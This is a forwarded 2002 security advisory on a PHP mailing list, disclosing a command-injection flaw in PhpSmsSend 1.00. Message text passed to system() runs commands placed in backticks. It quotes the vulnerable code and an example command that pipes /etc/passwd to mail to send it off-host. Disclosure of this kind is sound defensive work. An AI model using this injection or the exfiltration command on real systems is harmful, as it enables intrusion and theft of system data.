I'm think I'm going to start forwarding all the bugtraq alerts for PHP scripts to this list. Any objections?
---------- Forwarded Message ---------- Subject: PhpSmsSend remote execute commands bug Date: Tue, 29 Jan 2002 18:57:51 +0000 (GMT) From: Indra Kusuma <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Cc: <[EMAIL PROTECTED]> ---[ PhpSmsSend remote execute commands bug ---[ About PhpSmsSend PhpSmsSend is a frontend to the SmsSend application. It consists of a .php file, from which you select one of the available scripts, and then you can send an SMS wherever you want, all around the world. PhpSmssend's website is http://zekiller.skytech.org/smssend.php ---[ Affected System PhpSmsSystem Version 1.00 ---[ Description from file .php : $str = SMSSEND." ".SCRIPTSPATH.$script." $params -- -d 0 ".PROXY; system($str,$res); if the sms messages contain a backtick "`" then inside of backtick will be execute as a system command. the result of the command will send via sms :), so the command output should be less than 160 characters to send via sms, but if the command using pipe (ex : cat /etc/passwd|mail [EMAIL PROTECTED]) or redirection then the messages status is successfully :) ---[ Greetz my Guru GaniSalman, my friend OpsCrew, #indoSniffing and #medanHacking (DalNet), Fate Research Labs (www.fatelabs.com), LUG STIKOM (lug.stikom.edu), and the gauli.com owner --- cheers, IndraKusuma ------------------------------------------------------- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
